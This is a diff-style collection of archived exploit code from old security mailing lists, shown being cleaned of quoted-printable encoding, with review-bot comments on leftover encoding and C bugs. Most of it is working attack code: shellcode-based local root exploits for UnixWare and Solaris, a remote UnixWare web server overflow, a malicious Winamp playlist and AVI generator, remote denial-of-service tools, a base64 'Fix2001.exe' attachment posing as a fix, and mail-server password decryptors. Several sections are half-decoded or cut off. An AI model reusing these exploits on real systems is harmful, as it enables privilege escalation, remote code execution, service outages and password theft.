$sumpath = "/usr/bin/sum";
$uidata_sym = "/tmp/uidata.tmp";
$compiler = "cc";
$uidadmin = "/usr/bin/uidadmin";
###
# Path to the directory where your $uidata_sym will exist relative to
# /etc/uidata/
###
$uidadminarg =3D "../../tmp";
$uidadminarg = "../../tmp";
print("\n* uidadmin exploit for UnixWare 7.1 <btellier\@usa.net>\n\n");
@ -69,20 +69,20 @@ if ( -e $ui_dest ) {
# stat $ui_dest for size in bytes and ctime (seconds since epoch)
###
$size=3D(stat($ui_dest))[7] || die "cannot stat $ui_dest";
$ctime=3D(stat($ui_dest))[10];
print("$ui_dest size=3D$size ctime=3D$ctime\n");
$size=(stat($ui_dest))[7] || die "cannot stat $ui_dest";
$ctime=(stat($ui_dest))[10];
print("$ui_dest size=$size ctime=$ctime\n");
###
# get the checksum value for $ui_dest
###
open(SUM, "$sumpath -r $ui_dest|");
$checksum=3D<SUM>;
$checksum=<SUM>;
chomp($checksum);
@sumfields=3Dsplit(' ', $checksum);
$chksum =3D @sumfields[0];
$chksum =3D~ s/^0//;
@sumfields=split(' ', $checksum);
$chksum = @sumfields[0];
$chksum =~ s/^0//;
print("$ui_dest checksum is $chksum\n");
@ -90,7 +90,7 @@ print("$ui_dest checksum is $chksum\n");
# Put our entry into $uidatafile, use trailing newline
###
$uidata=3D"$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest";
$uidata="$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest";
print("placing '$uidata' into $uidatafile\n");
open(TMP, ">$uidatafile");
print(TMP "$uidata\n");
@ -113,9 +113,9 @@ c
###
open (PRIV, "$privloc");
@privs =3D <PRIV>;
@privs = <PRIV>;
foreach $priv (@privs) {
if ($priv =3D~ /$ui_dest/) {
if ($priv =~ /$ui_dest/) {
print("Exploit successful. Run $ui_dest after reboot for rootshell
\n");
exit(0);
@ -130,7 +130,7 @@ print("Exploit not successful, sorry!\n");
bash-2.02$ id =
uid=3D106(xnec) gid=3D1(other)
uid=106(xnec) gid=1(other)
bash-2.02$ ls -la /etc/hosts.equiv
UX:ls: ERROR: Cannot access /etc/hosts.equiv: No such file or directory
bash-2.02$ ls -la /usr/bin/uidadmin


@ -21,7 +21,7 @@ This is exploitable to gain root privileges even though /usr/X/bin/xauto is not
#include <stdlib.h>
#include <stdio.h>
char scoshell[]=3D /* UnixWare 7.1 shellcode runs /tmp/ui */
char scoshell[]= /* UnixWare 7.1 shellcode runs /tmp/ui */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
@ -38,7 +38,7 @@ void buildui() {
FILE *fp;
char cc[100];
fp =3D fopen("/tmp/ui.c", "w");
fp = fopen("/tmp/ui.c", "w");
fprintf(fp, CODE);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
@ -49,17 +49,17 @@ void buildui() {
int main(int argc, char *argv[]) {
=
long int offset=3D0;
long int offset=0;
=
int i;
int egglen =3D EGGLEN;
int egglen = EGGLEN;
int retlen;
long int addr;
char egg[EGGLEN];
char ret[RETLEN];
// who needs __asm__? Per Solar Designer's suggestion
unsigned long sp =3D (unsigned long)&sp; =
unsigned long sp = (unsigned long)&sp; =
buildui();
@ -68,22 +68,22 @@ int main(int argc, char *argv[]) {
exit(0); =
}
else if (argc =3D=3D 2){
offset=3Datoi(argv[1]);
retlen=3DRETLEN;
else if (argc == 2){
offset=atoi(argv[1]);
retlen=RETLEN;
}
else if (argc =3D=3D 3) {
offset=3Datoi(argv[1]);
retlen=3Datoi(argv[2]); =
else if (argc == 3) {
offset=atoi(argv[1]);
retlen=atoi(argv[2]); =
}
else {
offset=3D9400;
retlen=3D2000;
offset=9400;
retlen=2000;
=
}
addr=3Dsp + offset;
addr=sp + offset;
=
fprintf(stderr, "UnixWare 7.x exploit for the non-su/gid
@ -96,12 +96,12 @@ int main(int argc, char *argv[]) {
memcpy(egg+(egglen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
=
for(i=3DALIGN;i< retlen-4;i+=3D4)
*(int *)&ret[i]=3Daddr; =
for(i=ALIGN;i< retlen-4;i+=4)
*(int *)&ret[i]=addr; =
=
memcpy(egg, "EGG=3D", 4);
memcpy(egg, "EGG=", 4);
putenv(egg);
execl("/usr/X/bin/xauto", "xauto","-t", ret, NULL); =


@ -29,7 +29,7 @@ When a program that is listed in the /etc/security/tcb/privs is executed it is g
** When you "run" and break at _init, change your EIP
** to something between 0x8046000 and 0x8048000 with =
** "set $eip =3D 0x8046b75" and "continue" twice.
** "set $eip = 0x8046b75" and "continue" twice.
**
**
** Brock Tellier btellier@usa.net
@ -40,7 +40,7 @@ When a program that is listed in the /etc/security/tcb/privs is executed it is g
#include <stdlib.h>
#include <stdio.h>
char scoshell[]=3D /* This isn't a buffer overflow! really! */
char scoshell[]= /* This isn't a buffer overflow! really! */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
@ -66,11 +66,11 @@ void usage(int ftype) {
void buildsm(int ftype) {
FILE *fp;
char cc[100];
fp =3D fopen("/tmp/sm.c", "w");
fp = fopen("/tmp/sm.c", "w");
if (ftype =3D=3D 1) fprintf(fp, DACREAD);
else if(ftype =3D=3D 2) fprintf(fp, DACWRITE);
else if(ftype =3D=3D 3) fprintf(fp, SETUID);
if (ftype == 1) fprintf(fp, DACREAD);
else if(ftype == 2) fprintf(fp, DACWRITE);
else if(ftype == 3) fprintf(fp, SETUID);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c");
@ -81,20 +81,20 @@ void buildsm(int ftype) {
int main(int argc, char *argv[]) {
int i;
int buflen =3D LEN;
int buflen = LEN;
char buf[LEN]; =
int filetype =3D 0;
int filetype = 0;
char filebuf[20]; =
if(argc > 2 || argc =3D=3D 1) {
if(argc > 2 || argc == 1) {
usage(filetype);
exit(0); =
}
if ( argc > 1 ) filetype=3Datoi(argv[1]);
if ( argc > 1 ) filetype=atoi(argv[1]);
if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); }
buildsm(filetype);
@ -104,9 +104,9 @@ fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
memset(buf,NOP,buflen);
memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
memcpy(buf, "XNEC=3D", 5);
memcpy(buf, "XNEC=", 5);
putenv(buf);
buf[buflen - 1] =3D 0;
buf[buflen - 1] = 0;
system("/bin/sh");
exit(0);


@ -8,7 +8,7 @@ A buffer overflow vulnerability in the '/usr/bin/mail' program's handling of the
* Shellcode by Cheez Whiz (fixes problem with shells dropping egid if it=
doesn't match your real gid)
* Will set gid=3D6(mail)
* Will set gid=6(mail)
*
* gcc -o mailex solx86gid.c
* /usr/bin/mail -m `./mailex 0 1975 2285` foo
@ -31,7 +31,7 @@ doesn't match your real gid)
#define NOP 0x90
char shell[] =3D
char shell[] =
/* 0 */ "\xeb\x45" /* jmp springboard */
/* syscall: */
/* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */
@ -90,29 +90,29 @@ main (int argc, char *argv[])
if (argc > 1)
offset =3D strtol(argv[1], NULL, 0);
offset = strtol(argv[1], NULL, 0);
if (argc > 2)
nop =3D strtoul(argv[2], NULL, 0);
nop = strtoul(argv[2], NULL, 0);
else
nop =3D 285;
nop = 285;
if (argc > 3)
buflen=3Datoi(argv[3]);
buflen=atoi(argv[3]);
else =
buflen=3DBUF;
buflen=BUF;
=
esp =3D get_esp();
esp = get_esp();
memset(buf, NOP, buflen);
memcpy(buf+nop, shell, strlen(shell));
for (i =3D nop+strlen(shell); i < buflen-4; i +=3D 4)
*((int *) &buf[i]) =3D esp+offset;
for (i = nop+strlen(shell); i < buflen-4; i += 4)
*((int *) &buf[i]) = esp+offset;
for (i =3D 0; i < strlen(buf); i++) putchar(buf[i]);
for (i = 0; i < strlen(buf); i++) putchar(buf[i]);
return;
}


@ -1,8 +1,9 @@
source: http://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
/*=20
/*
*
* solaris 2.7 lpset local exploit, i386.
* discovered by: duke
@ -21,7 +22,7 @@ A vulnerability exists in the handling of the -r option to the lpset program, as
#include <stdlib.h>
#include <string.h>
char shellcode[] =3D
char shellcode[] =
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
@ -33,36 +34,36 @@ long get_esp() { __asm__("movl %esp,%eax"); }
int main (int argc, char *argv[]) {
long offset=3D410;
int nop=3D64;
int gab=3D40;
long offset=410;
int nop=64;
int gab=40;
long addr;
char buffer[210];
int i, a, b;
if (argc > 1) offset =3D strtol(argv[1], NULL, 0);
if (argc > 2) gab =3D strtol(argv[2], NULL, 0);
if (argc > 3) nop =3D strtol(argv[2], NULL, 0);
if (argc > 1) offset = strtol(argv[1], NULL, 0);
if (argc > 2) gab = strtol(argv[2], NULL, 0);
if (argc > 3) nop = strtol(argv[2], NULL, 0);
for (a =3D 0; a <gab; a++)
buffer[a] =3D 'A';
for (a = 0; a <gab; a++)
buffer[a] = 'A';
addr =3D get_esp() + offset;
addr = get_esp() + offset;
buffer[a++] =3D addr & 0x000000ff;
buffer[a++] =3D (addr & 0x0000ff00) >> 8;
buffer[a++] =3D (addr & 0x00ff0000) >> 16;
buffer[a++] =3D (addr & 0xff000000) >> 24;
buffer[a++] = addr & 0x000000ff;
buffer[a++] = (addr & 0x0000ff00) >> 8;
buffer[a++] = (addr & 0x00ff0000) >> 16;
buffer[a++] = (addr & 0xff000000) >> 24;
for ( ; a < nop; a++)
buffer[a] =3D 0x90;
buffer[a] = 0x90;
for (b =3D 0; b < strlen(shellcode); b++, a++)
buffer[a] =3D shellcode[b];
for (b = 0; b < strlen(shellcode); b++, a++)
buffer[a] = shellcode[b];
buffer[strlen(buffer)] =3D '\0';
buffer[strlen(buffer)] = '\0';
printf("addr =3D 0x%x\n", addr);
printf("addr = 0x%x\n", addr);
execl("/usr/bin/lpset", "lpset", "-n", "fns", "-r", buffer,"digit", NULL);
}


@ -5,30 +5,30 @@ It has been reported that a buffer overflow exists in Tower Toppler. A local use
#!/usr/bin/perl
#kokanin@dtors.net playing a game
#hi bob
$len =3D 1024;
$ret =3D 0xbfbffd31;
$nop =3D "\x90";
$offset =3D 0;
$shellcode =3D =
$len = 1024;
$ret = 0xbfbffd31;
$nop = "\x90";
$offset = 0;
$shellcode = =
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xD9\x9d;
if (@ARGV =3D=3D 1) {
$offset =3D $ARGV[0];
if (@ARGV == 1) {
$offset = $ARGV[0];
}
=20
for ($i =3D 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .=3D $nop;
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
=20
$buffer .=3D $shellcode;
$buffer .= $shellcode;
$new_ret =3D pack('l', ($ret + $offset));
$new_ret = pack('l', ($ret + $offset));
=20
for ($i +=3D length($shellcode); $i < $len; $i +=3D 4) {
$buffer .=3D $new_ret;
for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}
local($ENV{'EGG'}) =3D $buffer;=20
local($ENV{'DISPLAY'}) =3D $new_ret x 64;=20
local($ENV{'EGG'}) = $buffer;=20
local($ENV{'DISPLAY'}) = $new_ret x 64;=20
exec("toppler 2>/dev/null");


@ -31,7 +31,7 @@ The version of Netscape FastTrack server that ships with UnixWare 7.1 is vulnera
#define NOP 0x90
#define LEN 102
char shell[] =3D /* Cheez Whiz, cheezbeast@hotmail.com */
char shell[] = /* Cheez Whiz, cheezbeast@hotmail.com */
"\xeb\x5f" /* jmp springboard */
"\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */
"\xc3" /* ret */
@ -78,7 +78,7 @@ char shell[] =3D /* Cheez Whiz, cheezbeast@hotmail.com */
"\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */
"\x2d\x63\xff"; /* DATA */
char *auth=3D
char *auth=
" HTTP/1.0\r\n"
"Host: localhost:457\r\n"
"Accept: text/html\r\n"
@ -89,13 +89,13 @@ char *auth=3D
char buf[BUFLEN];
char exploit[BUFLEN];
char *cmd =3D "/usr/X/bin/xterm${IFS}-display${IFS}unix:0.0";
char *cmd = "/usr/X/bin/xterm${IFS}-display${IFS}unix:0.0";
int len,i,sock;
int size =3D 368;
int offset=3D300;
int port =3D 457;
long sp =3D 0xbffc6004;
//unsigned long sp =3D (unsigned long)&sp;
int size = 368;
int offset=300;
int port = 457;
long sp = 0xbffc6004;
//unsigned long sp = (unsigned long)&sp;
struct sockaddr_in sock_a;
struct hostent *host;
@ -106,20 +106,20 @@ void main (int argc, char *argv[]) {
fprintf(stderr, "Error:Usage: %s <hostname> \n", argv[0]);
exit(0);
}
if(argc > 2) offset=3Datoi(argv[2]);
if(argc > 3) size=3Datoi(argv[3]);
if(argc > 2) offset=atoi(argv[2]);
if(argc > 3) size=atoi(argv[3]);
=
sp =3D sp + offset;
sp = sp + offset;
memset(exploit, NOP, size - strlen(shell) - strlen(cmd)- 6);
/* put size of *cmd into shellcode */
len =3D strlen(cmd); len++; len =3D -len;
shell[LEN+0] =3D (len >> 0) & 0xff;
shell[LEN+1] =3D (len >> 8) & 0xff;
shell[LEN+2] =3D (len >> 16) & 0xff;
shell[LEN+3] =3D (len >> 24) & 0xff;
len = strlen(cmd); len++; len = -len;
shell[LEN+0] = (len >> 0) & 0xff;
shell[LEN+1] = (len >> 8) & 0xff;
shell[LEN+2] = (len >> 16) & 0xff;
shell[LEN+3] = (len >> 24) & 0xff;
memcpy(exploit+(size-strlen(shell)-strlen(cmd)-6), shell, strlen(shell))=
;
@ -128,37 +128,37 @@ void main (int argc, char *argv[]) {
=
exploit[size-5]=3D(sp & 0x000000ff);
exploit[size-4]=3D(sp & 0x0000ff00) >> 8;
exploit[size-3]=3D(sp & 0x00ff0000) >> 16;
exploit[size-2]=3D(sp & 0xff000000) >> 24;
exploit[size-1]=3D0; =
exploit[size-5]=(sp & 0x000000ff);
exploit[size-4]=(sp & 0x0000ff00) >> 8;
exploit[size-3]=(sp & 0x00ff0000) >> 16;
exploit[size-2]=(sp & 0xff000000) >> 24;
exploit[size-1]=0; =
sprintf(buf, "GET /%s %s%s\r\n\r\n", exploit, auth,exploit);
buf[BUFLEN - 1] =3D 0;
buf[BUFLEN - 1] = 0;
fprintf(stderr, "httpd remote exploit for UnixWare 7.1\n");
fprintf(stderr, "using addr 0x%x offset %d\n", sp, offset);
fprintf(stderr, "Brock Tellier btellier@usa.net\n");
if((host=3D(struct hostent *)gethostbyname(argv[1])) =3D=3D NULL) {
if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
perror("gethostbyname"); =
exit(-1);
}
=
if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("create socket");
exit(-1);
}
sock_a.sin_family=3DAF_INET;
sock_a.sin_port=3Dhtons(port);
sock_a.sin_family=AF_INET;
sock_a.sin_port=htons(port);
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=3D0) {
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
perror("create connect");
exit(-1);
}


@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/925/info
Winamp, a program for playing mp3 and other audio files, uses playlist files (*.pls) to store lists of files for playback. The code that reads these files has an unchecked buffer which can be overflowed to cause arbitrary code to be executed. If an entry longer than 580 bytes is specified in the file, EIP gets overwritten.
This vulnerability can only be exploited remotely by convincing someone to download the hostile playlist and load it into Winamp. IE5 will download .pls files without user confirmation if winamp is installed.
*/
/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
@ -28,8 +30,8 @@ int main()
printf("\t\t.......................................\n\n");
char buffer[640];
char eip[8] =3D "\xF7\xCF\xB9\xBF";
char sploit[256] =3D =
char eip[8] = "\xF7\xCF\xB9\xBF";
char sploit[256] = =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\=
xFA\x2E\xC6
@ -43,22 +45,21 @@ xEC\xBA\xFF
FILE *file;
for(int x=3D0;x<580;x++)
for(int x=0;x<580;x++)
{
buffer[x] =3D 0x90;
buffer[x] = 0x90;
}
file =3D fopen("crAsh.pls","wb");
file = fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=3D");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=3D1");
fprintf(file, "\nNumberOfEntries=1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}
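Review bot: The quoted-printable decode in this section only replaced `=3D` and left the soft line breaks in place, so the new side still does not compile: `char sploit[256] = =` keeps a trailing `=` with the string literal starting on the next line, and the escape near the end of the literal is split as `\xC6\x45\=` / `xFA\x2E\xC6`. A trailing `=` at end of line is a QP soft break and should be removed together with the newline (`char sploit[256] =` followed directly by the literal; `...\xC6\x45\xFA\x2E\xC6...`), and `=20` encodes a trailing space. The same half-decoded residue remains in the avi-generator Python section (`\x54=` / `" \`, `\x62\=` / `x3d`), the MailMax and NetCplus password C sections (`hash[i] <= =`, `0x4b, =` / `0x3a };`), the keybd.exe section (`INVALID_SOC=` / `KET){=20`, `{=` / `=20`, `&pi)) =`), the Perl Translate-f section (`# Here =` and `translate =`, whose wrapped comment tails `is the backslash at the end of the url ;)` and `header :))` are now bare lines the parser will choke on), the vbscript HTML (`"wscript.shell")=`, `font-si=`), and the persistent-XSS HTML (`width="68%">` followed by a lone `=`, `style="BORDER-BOTTOM: ... =`). main() for this file begins before the second hunk.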


@ -35,16 +35,16 @@ main (int argc, char **argv)
struct hostent *he;
fprintf (stderr,
"\n-=3D Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =3D-\n");
"\n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-\n");
if (argc < 2)
usage (argv[0]);
type =3D 0;
type = 0;
if (argc > 2)
type =3D atol (argv[2]);
type = atol (argv[2]);
ptr =3D buffer;
ptr = buffer;
switch (type)
{
case 1:
@ -76,38 +76,38 @@ buffer);
break;
}
if ((sock =3D socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror ("socket()");
return -1;
}
if ((he =3D gethostbyname (argv[1])) !=3D NULL)
if ((he = gethostbyname (argv[1])) != NULL)
{
ip =3D *(unsigned long *) he->h_addr;
ip = *(unsigned long *) he->h_addr;
}
else
{
if ((ip =3D inet_addr (argv[1])) =3D=3D NULL)
if ((ip = inet_addr (argv[1])) == NULL)
{
perror ("inet_addr()");
return -1;
}
}
sin.sin_family =3D AF_INET;
sin.sin_addr.s_addr =3D ip;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
switch (type)
{
case 1:
sin.sin_port =3D htons (110);
sin.sin_port = htons (110);
break;
case 2:
sin.sin_port =3D htons (25);
sin.sin_port = htons (25);
break;
default:
sin.sin_port =3D htons (143);
sin.sin_port = htons (143);
break;
}
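Review bot: `if ((ip = inet_addr (argv[1])) == NULL)` on the new side cannot detect a bad address: inet_addr() reports failure with `INADDR_NONE` (0xffffffff), not a null pointer, so the comparison mixes an integer with a pointer constant and a malformed host string is silently sent to 255.255.255.255. The check should read `if ((ip = inet_addr (argv[1])) == INADDR_NONE)`. Separately, `ip = *(unsigned long *) he->h_addr;` reads sizeof(unsigned long) bytes from a 4-byte address record, which over-reads on LP64 platforms; copying `he->h_length` bytes with memcpy into `sin.sin_addr` avoids that. main() begins before the first hunk and continues after the last one.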


@ -7,8 +7,8 @@ vulnerability
# Tested on: windows 7 Ultimate k
# Language : python
f =3D open("hack.avi", "wb")
data =3D "\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54=
f = open("hack.avi", "wb")
data = "\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54=
" \
"\xc0\x00\x00\x00\x68\x64\x72\x6c\x61\x76\x69\x68\x38\x00\x00\x00" =
\
@ -41,7 +41,7 @@ f.write(data)
for i in range(0, 0x71a):
f.write("\x00")
data =3D "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\=
data = "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\=
x3d\x4c\x00"
f.write(data)


@ -41,7 +41,7 @@ SOCKADDR_IN sin;
char *sav;
WSADATA wsadata;
WORD wVersionRequested =3D MAKEWORD (2,0);
WORD wVersionRequested = MAKEWORD (2,0);
printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
@ -56,7 +56,7 @@ ExitProcess (0);
if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);
if (!(sav =3D (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0);
@ -66,20 +66,20 @@ lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");
sin.sin_family =3D AF_INET;
sin.sin_port =3D htons (80);
sin.sin_family = AF_INET;
sin.sin_port = htons (80);
if ( (sin.sin_addr.s_addr=3Dinet_addr (argv[1])) =3D=3D INADDR_NONE)
if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}
sock1 =3D socket (AF_INET, SOCK_STREAM, 0);
sock1 = socket (AF_INET, SOCK_STREAM, 0);
printf ("\nconnecting to %s...", argv[1]);
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) =3D=3D SOCKET_ERROR )
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");
else


@ -11,4 +11,4 @@ charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: about:blank
<iframe name=3Difr src=3D"">
<iframe name=ifr src="">


@ -25,10 +25,10 @@ Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
name=3D"Fix2001.exe"
name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=3D"Fix2001.exe"
filename="Fix2001.exe"
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
@ -60,10 +60,10 @@ Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
name=3D"Fix2001.exe"
name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=3D"Fix2001.exe"
filename="Fix2001.exe"
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g


@ -32,61 +32,61 @@ MailMaxSize=20
#define DEFAULT 3
void main() {
unsigned char start_table[4][8] =3D {
unsigned char start_table[4][8] = {
{ 0x30, 0x4a, 0x7b, 0x53, 0x50, 0x7e, 0x54, 0x43 },
{ 0x41, 0x5b, 0x2e, 0x64, 0x61, 0x31, 0x65, 0x54 },
{ 0x60, 0x7a, 0x4d, 0x25, 0x22, 0x50, 0x26, 0x73 },
{ 0x7e, 0x3a, 0x6b, 0x43, 0x40, 0x6e, 0x44, 0x33} };
unsigned char uname =3D 0x46; /* Just the first character from DIR=3D =
unsigned char uname = 0x46; /* Just the first character from DIR= =
entry */
unsigned char hash[8] =3D { 'E', '1', 'U', '0', 't', 'b', '*', '&' } ;
unsigned char hash[8] = { 'E', '1', 'U', '0', 't', 'b', '*', '&' } ;
unsigned char pass[8];
unsigned char i;
unsigned char range;
if(uname >=3D 0x30 && uname <=3D39) {
for(i=3D0;i<=3D7;i++) {
hash[i]+=3D1; }
if(uname >= 0x30 && uname <=39) {
for(i=0;i<=7;i++) {
hash[i]+=1; }
}
for(i=3D0;i<8;i++) {
if(hash[i] =3D=3D start_table[DEFAULT][i]) {
pass[i] =3D uname;
for(i=0;i<8;i++) {
if(hash[i] == start_table[DEFAULT][i]) {
pass[i] = uname;
continue; }
range=3DLOWER; /* hash values wrap to 0x21 after 0x7e */
if(hash[i] >=3D start_table[DIGIT][i] && hash[i] <=3D =
range=LOWER; /* hash values wrap to 0x21 after 0x7e */
if(hash[i] >= start_table[DIGIT][i] && hash[i] <= =
(start_table[DIGIT][i] + 0x0a))
range =3D DIGIT;
if(hash[i] >=3D start_table[UPPER][i] && hash[i] <=3D =
range = DIGIT;
if(hash[i] >= start_table[UPPER][i] && hash[i] <= =
(start_table[UPPER][i] + 0x1a))
range=3DUPPER;
if(hash[i] >=3D start_table[LOWER][i] && hash[i] <=3D =
range=UPPER;
if(hash[i] >= start_table[LOWER][i] && hash[i] <= =
(start_table[LOWER][i] + 0x1a))
range=3DLOWER;
range=LOWER;
if(range=3D=3DDIGIT) {
if(i=3D=3D2 || i=3D=3D5) {
if(range==DIGIT) {
if(i==2 || i==5) {
if(hash[i] < 0x73) {
hash[i] =3D hash[i] + 0x5e; } }
pass[i] =3D ( hash[i] - start_table[DIGIT][i] ) + 0x30; }
hash[i] = hash[i] + 0x5e; } }
pass[i] = ( hash[i] - start_table[DIGIT][i] ) + 0x30; }
if(range=3D=3DUPPER) {
pass[i] =3D ( hash[i] - start_table[UPPER][i] ) + 0x41;
if(pass[i] >=3D uname)
pass[i]+=3D1; }
if(range==UPPER) {
pass[i] = ( hash[i] - start_table[UPPER][i] ) + 0x41;
if(pass[i] >= uname)
pass[i]+=1; }
if(range=3D=3DLOWER) {
if(i=3D=3D1 || i =3D=3D7) {
if(range==LOWER) {
if(i==1 || i ==7) {
if(hash[i] < 0x73) {
hash[i] =3D hash[i] + 0x5e; } }
pass[i] =3D ( hash[i] - start_table[LOWER][i] ) + 0x61; }
hash[i] = hash[i] + 0x5e; } }
pass[i] = ( hash[i] - start_table[LOWER][i] ) + 0x61; }
}
printf("The password is:\n\t");
for(i=3D0;i<8;i++) {
for(i=0;i<8;i++) {
printf("%c ", pass[i]);
}
printf("\n");
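Review bot: `if(uname >= 0x30 && uname <=39)` is an empty range: 39 is decimal (0x27), which is below 0x30, so the `hash[i]+=1` adjustment for digit-leading user names can never run. Every other bound in this function is written in hex, so `uname <= 0x39` looks like the intended literal — but since this is an archived copy, confirm against the original publication rather than changing it silently. `void main()` is also non-standard; `int main(void)` with `return 0;` is the portable spelling. The function body continues past the end of the hunk.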


@ -16,47 +16,47 @@ by NetCplus */
int main() {
unsigned char start[8] =3D { 0x27, 0x41, 0x72, 0x4a, 0x47, 0x75, 0x4b, =
unsigned char start[8] = { 0x27, 0x41, 0x72, 0x4a, 0x47, 0x75, 0x4b, =
0x3a };
unsigned char hash[8] =3D { '%', '}', 'S', 'p', '%', 'g', 'Z', '(' } ;
unsigned char hash[8] = { '%', '}', 'S', 'p', '%', 'g', 'Z', '(' } ;
/* Enter the encrypted password into hash above */
unsigned char except[8] =3D { '~', ':', 'k', 'C', '@', 'n', 'D', '3' };
unsigned char ex_order[7] =3D { 't', 'm', 'O', 'L', 's', 'B', 'R' };
unsigned char except[8] = { '~', ':', 'k', 'C', '@', 'n', 'D', '3' };
unsigned char ex_order[7] = { 't', 'm', 'O', 'L', 's', 'B', 'R' };
unsigned char pass[8];
unsigned char i;
unsigned char range;
if(hash[0] >=3D '!' && hash[0] <=3D '&')
hash[0]=3D(hash[0] - 0x20) + 0x7e;
for(i=3D0;i<8;i++) {
if(hash[i] >=3D except[i] && hash[i] <=3D (except[i] + 6) ) {
